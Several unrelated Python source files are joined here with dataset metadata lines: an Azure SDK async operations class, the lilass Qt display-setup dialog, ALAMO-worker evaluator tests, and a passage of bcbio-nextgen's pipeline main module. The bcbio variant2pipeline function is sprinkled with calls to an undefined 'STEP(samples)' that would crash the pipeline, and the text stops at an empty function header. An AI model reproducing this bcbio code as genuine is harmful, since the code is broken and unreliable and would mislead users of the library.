from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class TestSummariesOperations:
"""TestSummariesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~test_base.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name: str,
test_base_account_name: str,
**kwargs: Any
) -> AsyncIterable["_models.TestSummaryListResult"]:
"""Lists the Test Summaries of all the packages under a Test Base Account.
:param resource_group_name: The name of the resource group that contains the resource.
:type resource_group_name: str
:param test_base_account_name: The resource name of the Test Base Account.
:type test_base_account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either TestSummaryListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~test_base.models.TestSummaryListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TestSummaryListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-12-16-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'testBaseAccountName': self._serialize.url("test_base_account_name", test_base_account_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('TestSummaryListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.TestBase/testBaseAccounts/{testBaseAccountName}/testSummaries'} # type: ignore
async def get(
self,
resource_group_name: str,
test_base_account_name: str,
test_summary_name: str,
**kwargs: Any
) -> "_models.TestSummaryResource":
"""Gets a Test Summary with specific name from all the Test Summaries of all the packages under a
Test Base Account.
:param resource_group_name: The name of the resource group that contains the resource.
:type resource_group_name: str
:param test_base_account_name: The resource name of the Test Base Account.
:type test_base_account_name: str
:param test_summary_name: The name of the Test Summary.
:type test_summary_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: TestSummaryResource, or the result of cls(response)
:rtype: ~test_base.models.TestSummaryResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TestSummaryResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-12-16-preview"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'testBaseAccountName': self._serialize.url("test_base_account_name", test_base_account_name, 'str'),
'testSummaryName': self._serialize.url("test_summary_name", test_summary_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('TestSummaryResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.TestBase/testBaseAccounts/{testBaseAccountName}/testSummaries/{testSummaryName}'} # type: ignore
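    # Minimal usage sketch (illustrative only): a management client exposes this
    # operation group as an attribute, conventionally `client.test_summaries` for
    # this class name; that attribute name and the resource values below are
    # assumptions, not taken from this file.
    #
    #   async for summary in client.test_summaries.list(
    #           resource_group_name="my-rg", test_base_account_name="my-account"):
    #       print(summary.name)
    #
    #   summary = await client.test_summaries.get(
    #       resource_group_name="my-rg", test_base_account_name="my-account",
    #       test_summary_name="my-summary")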
| mit | -5,264,327,462,107,151,000 | 48.839779 | 212 | 0.652478 | false |
RalfJung/lilass | qt_frontend.py | 1 | 7267 | # DSL - easy Display Setup for Laptops
# Copyright (C) 2012-2015 Ralf Jung <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import sys, os
from screen import RelativeScreenPosition, ScreenSetup
try:
    # Be fine with PyQt5 not being installed
from PyQt5 import QtCore, QtWidgets, uic
class PositionSelection(QtWidgets.QDialog):
def __init__(self, situation):
# set up main window
super(PositionSelection, self).__init__()
self._situation = situation
uifile = os.path.join(os.path.dirname(__file__), 'qt_dialogue.ui')
uic.loadUi(uifile, self)
# fill relative position box
for pos in RelativeScreenPosition:
self.relPos.addItem(pos.text, pos)
# keep resolutions in sync when in mirror mode
def syncIfMirror(source, target):
def _slot(idx):
if self.isMirror:
target.setCurrentIndex(idx)
source.currentIndexChanged.connect(_slot)
syncIfMirror(self.intRes, self.extRes)
syncIfMirror(self.extRes, self.intRes)
# if situation has a previousSetup, use its values as initial state
if situation.previousSetup:
p = situation.previousSetup
self.intEnabled.setChecked(p.intResolution is not None)
self.extEnabled.setChecked(p.extResolution is not None)
if p.relPosition:
self.relPos.setCurrentIndex(p.relPosition.value - 1)
if p.extIsPrimary:
self.extPrimary.setChecked(True)
else:
self.intPrimary.setChecked(True)
# Pre-select the previous resolution
self._intDefaultRes = p.intResolution
self._extDefaultRes = p.extResolution
self._mirrorDefaultRes = p.intResolution if p.relPosition == RelativeScreenPosition.MIRROR else None # in case of a mirror, they would be the same anyway
else:
self._intDefaultRes = situation.internalConnector.getPreferredResolution()
self._extDefaultRes = situation.externalConnector.getPreferredResolution()
self._mirrorDefaultRes = None
# connect the update function
self.intEnabled.toggled.connect(self.updateEnabledControls)
self.extEnabled.toggled.connect(self.updateEnabledControls)
self.relPos.currentIndexChanged.connect(self.updateEnabledControls)
# make sure we are in a correct state
self.updateEnabledControls()
def getRelativeScreenPosition(self):
idx = self.relPos.currentIndex()
return self.relPos.itemData(idx)
def fillResolutionBox(self, box, resolutions, select = None):
# if the count did not change, update in-place (this avoids flicker)
if box.count() == len(resolutions):
for idx, res in enumerate(resolutions):
box.setItemText(idx, str(res))
box.setItemData(idx, res)
if res == select:
box.setCurrentIndex(idx)
else:
# first clear it
while box.count() > 0:
box.removeItem(0)
# then fill it
for res in resolutions:
box.addItem(str(res), res)
if res == select:
box.setCurrentIndex(box.count() - 1) # select the most recently added one
def updateEnabledControls(self):
intEnabled = self.intEnabled.isChecked()
extEnabled = self.extEnabled.isChecked()
bothEnabled = intEnabled and extEnabled
self.isMirror = bothEnabled and self.getRelativeScreenPosition() == RelativeScreenPosition.MIRROR # only if both are enabled, we can really mirror
# configure screen controls
self.intRes.setEnabled(intEnabled)
self.intPrimary.setEnabled(intEnabled and not self.isMirror)
self.extRes.setEnabled(extEnabled)
self.extPrimary.setEnabled(extEnabled and not self.isMirror)
if not intEnabled and extEnabled:
self.extPrimary.setChecked(True)
elif not extEnabled and intEnabled:
self.intPrimary.setChecked(True)
# which resolutions do we offer?
if self.isMirror:
commonRes = self._situation.commonResolutions()
self.fillResolutionBox(self.intRes, commonRes, select = self._mirrorDefaultRes)
self.fillResolutionBox(self.extRes, commonRes, select = self._mirrorDefaultRes)
self.intRes.setCurrentIndex(self.extRes.currentIndex())
else:
self.fillResolutionBox(self.intRes, self._situation.internalConnector.getResolutionList(), select = self._intDefaultRes)
self.fillResolutionBox(self.extRes, self._situation.externalConnector.getResolutionList(), select = self._extDefaultRes)
# configure position control
self.posGroup.setEnabled(bothEnabled)
self.posLabel1.setEnabled(bothEnabled)
self.posLabel2.setEnabled(bothEnabled)
self.relPos.setEnabled(bothEnabled)
# avoid having no screen
self.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(intEnabled or extEnabled)
def run(self):
self.exec_()
if not self.result(): return None
intRes = self.intRes.itemData(self.intRes.currentIndex()) if self.intEnabled.isChecked() else None
extRes = self.extRes.itemData(self.extRes.currentIndex()) if self.extEnabled.isChecked() else None
return ScreenSetup(intRes, extRes, self.getRelativeScreenPosition(), self.extPrimary.isChecked())
except ImportError:
pass
# Qt frontend
class QtFrontend:
def __init__(self):
from PyQt5 import QtWidgets
self.app = QtWidgets.QApplication(sys.argv)
print("Qt loaded")
def error(self, message):
from PyQt5 import QtWidgets
QtWidgets.QMessageBox.critical(None, 'Fatal error', message)
def setup(self, situation):
return PositionSelection(situation).run()
@staticmethod
def isAvailable():
try:
import PyQt5
return True
except ImportError:
return False
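# Rough usage sketch (illustrative; `situation` stands for the screen-situation
# object the caller builds elsewhere in lilass):
#   if QtFrontend.isAvailable():
#       frontend = QtFrontend()
#       setup = frontend.setup(situation)   # ScreenSetup, or None if cancelled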
| gpl-2.0 | -1,890,211,412,476,436,700 | 45.583333 | 169 | 0.624329 | false |
RulersOfAsgard/ALAMO-worker | alamo_worker/plugins/tests/test_evaluate.py | 1 | 14081 | # -*- coding: utf-8 -*-
from collections import OrderedDict
from unittest.case import TestCase
from unittest import mock
from alamo_common.test.utils import override_settings
from alamo_worker.plugins.druid import DruidResult
from alamo_worker.plugins.evaluate import ResultEvaluator
from alamo_worker.plugins.http_check import HttpResult
from alamo_worker.plugins.graphite import GraphiteResult
from alamo_worker.plugins.prometheus import PrometheusResult
from alamo_worker.plugins.mixins import (
RESULT_OK,
RESULT_FAILED,
RESULT_UNKNOWN,
)
class TestResultEvaluator(TestCase):
@staticmethod
def get_payload(rule):
return {
'id': 2206299,
'triggers': [
{
'rule': rule,
'url': 'http://some.url',
}],
}
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluation_for_unknown_status(self, stats):
rule = 'check_name.values < 200'
plugin_results = [
# unknown status
GraphiteResult('check_name', {}, env='test')
]
evaluator = ResultEvaluator()
payload = self.get_payload(rule)
payload['unknown_as_failure'] = True
result = evaluator.evaluate(payload, plugin_results)
expected = {
'status': RESULT_FAILED,
'message': ('Metric not found in `check_name` source, '
'check your query'),
'hysteresis': RESULT_OK
}
self.assertEqual(result['triggers'][0]['result'], expected)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_passing_rule(self, stats):
rule = 'check_name.status_code != 200'
plugin_results = [
HttpResult('check_name', 200)
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected = {
'status': RESULT_OK,
'message': '',
'hysteresis': RESULT_OK,
'http_response_body': '',
}
self.assertEqual(result['triggers'][0]['result'], expected)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_failing_rule(self, stats):
rule = 'check_name.status_code != 200'
plugin_results = [
HttpResult('check_name', 404)
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
msg = 'Check failed for rule `{}` which evaluates to `True`'.format(
rule)
expected = {
'status': RESULT_FAILED,
'message': msg,
'hysteresis': RESULT_OK,
'http_response_body': '',
}
self.assertEqual(result['triggers'][0]['result'], expected)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_multiple_successful_results(self, stats):
rule = 'check1.status_code != 200 AND check2.status_code != 200'
plugin_results = [
HttpResult('check1', 200, status=RESULT_UNKNOWN),
HttpResult('check2', 200, status=RESULT_OK),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected = {
'status': RESULT_UNKNOWN,
'message': '',
'hysteresis': RESULT_OK,
'http_response_body': '',
}
self.assertEqual(result['triggers'][0]['result'], expected)
@override_settings(FAIL_ON_UNKNOWN=False)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_multiple_failed_results(self, stats):
rule = 'check1.status_code != 200 AND check2.status_code != 200'
plugin_results = [
HttpResult('check1', 404, status=RESULT_UNKNOWN),
HttpResult('check2', 404, status=RESULT_OK),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
msg = 'Check failed for rule `check1.status_code != 200` '\
'which evaluates to `True`, Check failed for rule '\
'`check2.status_code != 200` which evaluates to `True`'
expected = {
'status': RESULT_FAILED,
'message': msg,
'hysteresis': RESULT_OK,
'http_response_body': '',
}
self.assertEqual(result['triggers'][0]['result'], expected)
@override_settings(FAIL_ON_UNKNOWN=True)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_multiple_failed_results_with_strict_fail(self, stats):
rule = 'check1.status_code != 200 AND check2.status_code != 200'
plugin_results = [
HttpResult('check1', 404, status=RESULT_UNKNOWN),
HttpResult('check2', 404, status=RESULT_OK),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected = {
'status': RESULT_UNKNOWN,
'hysteresis': 0,
'message': '',
'http_response_body': '',
}
self.assertEqual(result['triggers'][0]['result'], expected)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_multiple_different_results(self, stats):
rule = 'check1.status_code != 200 AND check2.status_code != 200'
plugin_results = [
HttpResult('check1', 404, status=RESULT_OK),
HttpResult('check2', 200, status=RESULT_OK),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected = {
'status': RESULT_OK,
'message': '',
'hysteresis': RESULT_OK,
'http_response_body': '',
}
self.assertEqual(result['triggers'][0]['result'], expected)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
@mock.patch.object(GraphiteResult, 'build_meta')
def test_evaluate_multiple_sources_with_diff_statuses_and_one_is_unknown(
self, *args
):
plugin_results = [
GraphiteResult('check_first', {'a': [5]}, ),
# this result is unknown
GraphiteResult('check_second', {}),
]
payload = {
'id': 999,
'triggers': [
{'rule': 'check_first.values < 1'},
{'rule': 'check_second.values < 200'},
]
}
result = ResultEvaluator().evaluate(payload, plugin_results)
expected = {
'status': RESULT_OK,
'message': '',
'hysteresis': RESULT_OK,
}
self.assertEqual(result['triggers'][0]['result'], expected)
self.assertEqual(result['triggers'][1]['result'], {
'status': RESULT_UNKNOWN,
'message': ('Metric not found in `check_second` source, '
'check your query'),
'hysteresis': RESULT_OK,
})
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
@mock.patch.object(GraphiteResult, 'build_meta')
def test_evaluation_build_proper_target_for_trigger(self, *args):
plugin_results = [
GraphiteResult('foo', {'foo': [1, 2, 3]}, metric='stats.test.foo'),
GraphiteResult('bar', {'bar': [1, 2, 3]}, metric='stats.test.bar'),
GraphiteResult('baz', {'baz': [1, 2, 3]}, metric='stats.test.baz'),
]
trigger = {'rule': 'foo.values > 10 OR bar.values > 10'}
payload = {
'id': 999,
'triggers': [trigger]
}
ResultEvaluator().evaluate(payload, plugin_results)
expected = {
'status': RESULT_OK,
'message': '',
'hysteresis': RESULT_OK
}
self.assertEqual(trigger['result'], expected)
self.assertEqual(trigger['target'], 'stats.test.bar,stats.test.foo')
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_invalid_rule(self, stats):
rule = 'cat dog'
plugin_results = [
HttpResult('check', 200),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected = {
'status': RESULT_UNKNOWN,
'message': '',
'hysteresis': RESULT_OK,
'http_response_body': '',
}
self.assertEqual(result['triggers'][0]['result'], expected)
stats.increment.incr.assert_called_once_with(
'manager.warnings.invalid_rule')
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_failed_plugin_result(self, stats):
rule = 'check.status_code != 200'
content = 'some content'
plugin_results = [
HttpResult('check', 200, status=RESULT_FAILED,
message='some message', content=content),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected = {
'status': RESULT_FAILED,
'message': 'some message',
'hysteresis': RESULT_OK,
'http_response_body': content
}
expected_meta = {
'links': {
'trigger_url': {'href': 'http://some.url', 'type': 'link'}
},
}
self.assertEqual(result['triggers'][0]['result'], expected)
self.assertEqual(result['triggers'][0]['meta'], expected_meta)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_unknown_plugin_result(self, stats):
rule = 'druid.histogram_90 > 70000'
plugin_results = [
DruidResult('druid', [], status=RESULT_UNKNOWN,
message='Unknown Message'),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected = {
'status': RESULT_UNKNOWN,
'message': 'Unknown Message',
'hysteresis': RESULT_OK
}
self.assertEqual(
result['triggers'][0]['result'], expected
)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
@mock.patch.object(GraphiteResult, 'build_meta')
def test_evaluate_successful_graphite_result(self, mock_build_meta, stats):
rule = 'check.values > 6'
plugin_results = [
GraphiteResult('check', {'bunny.a': [1, 2, 3], 'bunny.b': [4, 5]}),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected_result = {
'status': RESULT_OK,
'message': '',
'hysteresis': RESULT_OK
}
expected_meta = {
'links': {
'trigger_url': {'href': 'http://some.url', 'type': 'link'}
}
}
self.assertEqual(result['triggers'][0]['result'], expected_result)
self.assertEqual(result['triggers'][0]['meta'], expected_meta)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
@mock.patch.object(GraphiteResult, 'build_meta')
def test_evaluate_failed_graphite_result(self, mock_build_meta, stats):
rule = 'check.values > 2'
plugin_results = [
GraphiteResult(
'check',
OrderedDict([('bunny.a', [1, 2, 3]), ('bunny.b', [4, 5])])
),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected_result = {
'status': RESULT_FAILED,
'message': 'Check failed for rule `check.values > 2` which '
"evaluates to `{'bunny.a': [3], 'bunny.b': [4, 5]}`",
'hysteresis': RESULT_OK
}
expected_meta = {
'failed_metrics': {'bunny.a': [3], 'bunny.b': [4, 5]},
'links': {
'trigger_url': {'href': 'http://some.url', 'type': 'link'}
}
}
self.assertEqual(result['triggers'][0]['result'], expected_result)
self.assertEqual(result['triggers'][0]['meta'], expected_meta)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_successful_prometheus_result(self, stats):
rule = 'check.values > 2'
plugin_results = [
PrometheusResult(
'check',
{(('__name__', 'metric1'),): [0, 1]},
RESULT_OK, '', 2
),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected = {
'status': RESULT_OK,
'message': '',
'hysteresis': RESULT_OK
}
self.assertEqual(result['triggers'][0]['result'], expected)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_failed_prometheus_result(self, stats):
rule = 'check.values > 2'
plugin_results = [
PrometheusResult(
'check',
{(('__name__', 'metric1'),): [1, 2, 3]},
RESULT_OK, '', 2
),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected_result = {
'status': RESULT_FAILED,
'message': (
'Check failed for rule `check.values > 2` '
'which evaluates to `{((\'__name__\', \'metric1\'),): [3]}`'
),
'hysteresis': RESULT_OK
}
expected_meta = {
'failed_metrics': {"(('__name__', 'metric1'),)": [3]},
'links': {
'trigger_url': {'href': 'http://some.url', 'type': 'link'}
}
}
self.assertEqual(result['triggers'][0]['result'], expected_result)
self.assertEqual(result['triggers'][0]['meta'], expected_meta)
| apache-2.0 | 7,516,206,015,066,631,000 | 36.251323 | 79 | 0.550884 | false |
vladsaveliev/bcbio-nextgen | bcbio/pipeline/main.py | 1 | 27548 | """Main entry point for distributed next-gen sequencing pipelines.
Handles running the full pipeline based on instructions
"""
from __future__ import print_function
from collections import defaultdict
import copy
import os
import sys
import resource
import tempfile
import toolz as tz
from bcbio import log, heterogeneity, hla, structural, utils
from bcbio.cwl.inspect import initialize_watcher
from bcbio.distributed import prun
from bcbio.distributed.transaction import tx_tmpdir
from bcbio.log import logger, DEFAULT_LOG_DIR
from bcbio.ngsalign import alignprep
from bcbio.pipeline import datadict as dd
from bcbio.pipeline import (archive, config_utils, disambiguate, region,
run_info, qcsummary, rnaseq)
from bcbio.provenance import profile, system
from bcbio.variation import (ensemble, genotype, population, validate, joint,
peddy)
from bcbio.chipseq import peaks, atac
def run_main(workdir, config_file=None, fc_dir=None, run_info_yaml=None,
parallel=None, workflow=None):
"""Run variant analysis, handling command line options.
"""
# Set environment to standard to use periods for decimals and avoid localization
locale_to_use = utils.get_locale()
os.environ["LC_ALL"] = locale_to_use
os.environ["LC"] = locale_to_use
os.environ["LANG"] = locale_to_use
workdir = utils.safe_makedir(os.path.abspath(workdir))
os.chdir(workdir)
config, config_file = config_utils.load_system_config(config_file, workdir)
parallel = log.create_base_logger(config, parallel)
log.setup_local_logging(config, parallel)
logger.info(f"System YAML configuration: {os.path.abspath(config_file)}.")
logger.info(f"Locale set to {locale_to_use}.")
if config.get("log_dir", None) is None:
config["log_dir"] = os.path.join(workdir, DEFAULT_LOG_DIR)
if parallel["type"] in ["local", "clusterk"]:
_setup_resources()
_run_toplevel(config, config_file, workdir, parallel,
fc_dir, run_info_yaml)
elif parallel["type"] == "ipython":
assert parallel["scheduler"] is not None, "IPython parallel requires a specified scheduler (-s)"
if parallel["scheduler"] != "sge":
assert parallel["queue"] is not None, "IPython parallel requires a specified queue (-q)"
elif not parallel["queue"]:
parallel["queue"] = ""
_run_toplevel(config, config_file, workdir, parallel,
fc_dir, run_info_yaml)
else:
raise ValueError("Unexpected type of parallel run: %s" % parallel["type"])
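# Hypothetical direct invocation of run_main() (bcbio normally reaches it via its
# CLI wrapper; every path and the parallel dict below are placeholders):
#   run_main("/path/to/work_dir",
#            config_file="/path/to/bcbio_system.yaml",
#            run_info_yaml="/path/to/project.yaml",
#            parallel={"type": "local", "cores": 8})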
def _setup_resources():
"""Attempt to increase resource limits up to hard limits.
    This allows us to avoid running out of file handles where we can
move beyond the soft limit up to the hard limit.
"""
target_procs = 10240
cur_proc, max_proc = resource.getrlimit(resource.RLIMIT_NPROC)
target_proc = min(max_proc, target_procs) if max_proc > 0 else target_procs
resource.setrlimit(resource.RLIMIT_NPROC, (max(cur_proc, target_proc), max_proc))
cur_hdls, max_hdls = resource.getrlimit(resource.RLIMIT_NOFILE)
target_hdls = min(max_hdls, target_procs) if max_hdls > 0 else target_procs
resource.setrlimit(resource.RLIMIT_NOFILE, (max(cur_hdls, target_hdls), max_hdls))
def _run_toplevel(config, config_file, work_dir, parallel,
fc_dir=None, run_info_yaml=None):
"""
Run toplevel analysis, processing a set of input files.
config_file -- Main YAML configuration file with system parameters
fc_dir -- Directory of fastq files to process
run_info_yaml -- YAML configuration file specifying inputs to process
"""
dirs = run_info.setup_directories(work_dir, fc_dir, config, config_file)
config_file = os.path.join(dirs["config"], os.path.basename(config_file))
pipelines, config = _pair_samples_with_pipelines(run_info_yaml, config)
system.write_info(dirs, parallel, config)
with tx_tmpdir(config if parallel.get("type") == "local" else None) as tmpdir:
tempfile.tempdir = tmpdir
for pipeline, samples in pipelines.items():
for xs in pipeline(config, run_info_yaml, parallel, dirs, samples):
pass
# ## Generic pipeline framework
def _wres(parallel, progs, fresources=None, ensure_mem=None):
"""Add resource information to the parallel environment on required programs and files.
Enables spinning up required machines and operating in non-shared filesystem
environments.
progs -- Third party tools used in processing
fresources -- Required file-based resources needed. These will be transferred on non-shared
filesystems.
ensure_mem -- Dictionary of required minimum memory for programs used. Ensures
enough memory gets allocated on low-core machines.
"""
parallel = copy.deepcopy(parallel)
parallel["progs"] = progs
if fresources:
parallel["fresources"] = fresources
if ensure_mem:
parallel["ensure_mem"] = ensure_mem
return parallel
def variant2pipeline(config, run_info_yaml, parallel, dirs, samples):
## Alignment and preparation requiring the entire input file (multicore cluster)
# Assign GATK supplied memory if required for post-process recalibration
align_programs = ["aligner", "samtools", "sambamba"]
if any(tz.get_in(["algorithm", "recalibrate"], utils.to_single_data(d)) in [True, "gatk"] for d in samples):
align_programs.append("gatk")
with prun.start(_wres(parallel, align_programs,
(["reference", "fasta"], ["reference", "aligner"], ["files"])),
samples, config, dirs, "multicore",
multiplier=alignprep.parallel_multiplier(samples)) as run_parallel:
with profile.report("organize samples", dirs):
samples = run_parallel("organize_samples", [[dirs, config, run_info_yaml,
[x[0]["description"] for x in samples]]])
with profile.report("alignment preparation", dirs):
samples = run_parallel("prep_align_inputs", samples)
samples = run_parallel("disambiguate_split", [samples])
with profile.report("alignment", dirs):
samples = run_parallel("process_alignment", samples)
samples = disambiguate.resolve(samples, run_parallel)
samples = alignprep.merge_split_alignments(samples, run_parallel)
with profile.report("callable regions", dirs):
samples = run_parallel("prep_samples", [samples])
samples = run_parallel("postprocess_alignment", samples)
samples = run_parallel("combine_sample_regions", [samples])
samples = run_parallel("calculate_sv_bins", [samples])
samples = run_parallel("calculate_sv_coverage", samples)
samples = run_parallel("normalize_sv_coverage", [samples])
samples = region.clean_sample_data(samples)
with profile.report("hla typing", dirs):
samples = hla.run(samples, run_parallel)
## Variant calling on sub-regions of the input file (full cluster)
with prun.start(_wres(parallel, ["gatk", "picard", "variantcaller"]),
samples, config, dirs, "full",
multiplier=region.get_max_counts(samples), max_multicore=1) as run_parallel:
with profile.report("alignment post-processing", dirs):
samples = region.parallel_prep_region(samples, run_parallel)
with profile.report("variant calling", dirs):
samples = genotype.parallel_variantcall_region(samples, run_parallel)
STEP(samples)
with profile.report("joint squaring off/backfilling", dirs):
samples = joint.square_off(samples, run_parallel)
## Finalize variants, BAMs and population databases (per-sample multicore cluster)
with prun.start(_wres(parallel, ["gatk", "gatk-vqsr", "snpeff", "bcbio_variation",
"gemini", "samtools", "fastqc", "sambamba",
"bcbio-variation-recall", "qsignature",
"svcaller", "kraken", "preseq"]),
samples, config, dirs, "multicore2",
multiplier=structural.parallel_multiplier(samples)) as run_parallel:
with profile.report("variant post-processing", dirs):
samples = run_parallel("postprocess_variants", samples)
STEP(samples)
samples = run_parallel("split_variants_by_sample", samples)
with profile.report("prepped BAM merging", dirs):
samples = region.delayed_bamprep_merge(samples, run_parallel)
with profile.report("validation", dirs):
samples = run_parallel("compare_to_rm", samples)
samples = genotype.combine_multiple_callers(samples)
with profile.report("ensemble calling", dirs):
samples = ensemble.combine_calls_parallel(samples, run_parallel)
STEP(samples)
with profile.report("validation summary", dirs):
samples = validate.summarize_grading(samples)
with profile.report("structural variation", dirs):
samples = structural.run(samples, run_parallel, "initial")
STEP(samples)
with profile.report("structural variation", dirs):
samples = structural.run(samples, run_parallel, "standard")
STEP(samples)
with profile.report("structural variation ensemble", dirs):
samples = structural.run(samples, run_parallel, "ensemble")
STEP(samples)
with profile.report("structural variation validation", dirs):
samples = run_parallel("validate_sv", samples)
STEP(samples)
with profile.report("heterogeneity", dirs):
samples = heterogeneity.run(samples, run_parallel)
STEP(samples)
with profile.report("population database", dirs):
samples = population.prep_db_parallel(samples, run_parallel)
STEP(samples)
with profile.report("peddy check", dirs):
samples = peddy.run_peddy_parallel(samples, run_parallel)
with profile.report("quality control", dirs):
samples = qcsummary.generate_parallel(samples, run_parallel)
STEP(samples)
with profile.report("archive", dirs):
samples = archive.compress(samples, run_parallel)
STEP(samples)
with profile.report("upload", dirs):
samples = run_parallel("upload_samples", samples)
for sample in samples:
run_parallel("upload_samples_project", [sample])
logger.info("Timing: finished")
return samples
def _debug_samples(i, samples):
